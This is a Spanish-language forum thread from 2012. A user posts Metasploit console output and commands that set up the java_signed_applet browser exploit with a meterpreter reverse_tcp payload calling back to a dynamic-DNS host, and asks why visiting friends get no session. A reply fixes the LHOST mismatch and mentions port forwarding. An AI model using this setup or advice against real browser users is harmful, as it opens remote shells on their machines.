Ayuda con exploit

Iniciado por BlackSS, 5 Octubre 2012, 23:21 PM

0 Miembros y 1 Visitante están viendo este tema.

BlackSS

Buenas, estamos practicando el metasploit con unos amigos (Supongo que un tema sobre metasploit va aqui) Ahora vereis lo que me dice el metasploit, la version que es y en lo que falla.   


  • Please wait while the Metasploi

  • Starting Metasploit Console...

    __________________________________
    |

    |                   METASPLOIT CYBE

    |__________________________________

          \
           \     .
            \
             \
              \            +
               *

        X                             /
                                     /
                                    /
                                   /
                          .       /
         .                       /
                                /
                               *
                      +


    ####      __     __     __

    ####    /    \ /    \ /    \      #

    ###################################

    ###################################

    # WAVE 4 ######## SCORE 31337 #####


    =[ metasploit v4.4.0-release
    + -- --=[ 902 exploits - 528 auxili
    + -- --=[ 250 payloads - 28 encoder


  • Successfully loaded plugin: pro
    msf > use exploit/multi/browser/java_sign
    ed_applet
    msf  exploit(java_signed_applet) > set PA
    YLOAD java/meterpreter/reverse_tcp
    PAYLOAD => java/meterpreter/reverse_tcp
    msf  exploit(java_signed_applet) > set LH
    OST blackss.zapto.org
    LHOST => blackss.zapto.org
    msf  exploit(java_signed_applet) > set TA
    RGET 0
    TARGET => 0
    msf  exploit(java_signed_applet) > set UR
    IPATH /set SRVPORT 8080
    URIPATH => /set SRVPORT 8080
    msf  exploit(java_signed_applet) > set LP
    ORT 4444
    LPORT => 4444
    msf  exploit(java_signed_applet) > exploi
    t
  • Exploit running as background job.
    msf  exploit(java_signed_applet) >
    [-] Handler failed to bind to 85.61.16.10
    1:4444
  • Started reverse handler on 0.0.0.0:44
    44
  • Using URL: http://0.0.0.0:8080/set SR
    VPORT 8080
  •   Local IP: http://192.168.1.12:8080/s
    et SRVPORT 8080
  • Server started.



    Ahora se supone que mi amigo, que entra a blackss.zapto.org:8080 deberia salirme en el metasploit. El problema es que no sale. Cuando ellos se meten, lo que les sale es :



    Esta página web no está disponible
    Se ha interrumpido la conexión con blackss.zapto.org.

    Esto sale en chrome, despues de esperar un rato.   

    Cual es el problema? Los comandos a utilizar fueron :

    use exploit/multi/browser/java_signed_applet
    set PAYLOAD java/meterpreter/reverse_tcp
    set LHOST reasen.zapto.org
    set TARGET 0
    set URIPATH /
    set SRVPORT 8080
    set LPORT 4444
    exploit


    La version de metasploit es :  metasploit v4.4.0-release


    Agradeceria mucho que respondieran y lo arreglaran...

ZxXxA

Parsa, fíjese cmo declara LHOST => blackss.zapto.org y en los datos de bitacora que fascilita apunta lo siguiente: set LHOST reasen.zapto.org

Además, esa maniobra debería incluir la configuración de ruteo de puerto y reglas NAT´s si así estuviera afectado el router a dde dirige el dominio reasen.zapto.org (Revisar bien cuáles reglas fueron declaradas tb. al dominio***.zapto.org)

Por lo que observo tu dirección IP dentro de la red LAN es
Local IP: http://192.168.1.12:8080... deberías configurar las conexiones entrantes y salientes a ese puerto 8080 (ya tenés un Apache corriendo?)

Además la persona se infectaría con una vulnerabilidad Java? Es un tanto ingenuo esa pensar que esa vulnerabilidad no será detectada por algún firewall/antivirus. A modo de laboratorio, puedes probarlo con diferentes maquinas virtuales usando proxys para ver cmo tira tu server con esa vulnerabilidad, probarlo con distros y navegadores vulnerables ;)

Bendiciones carnaL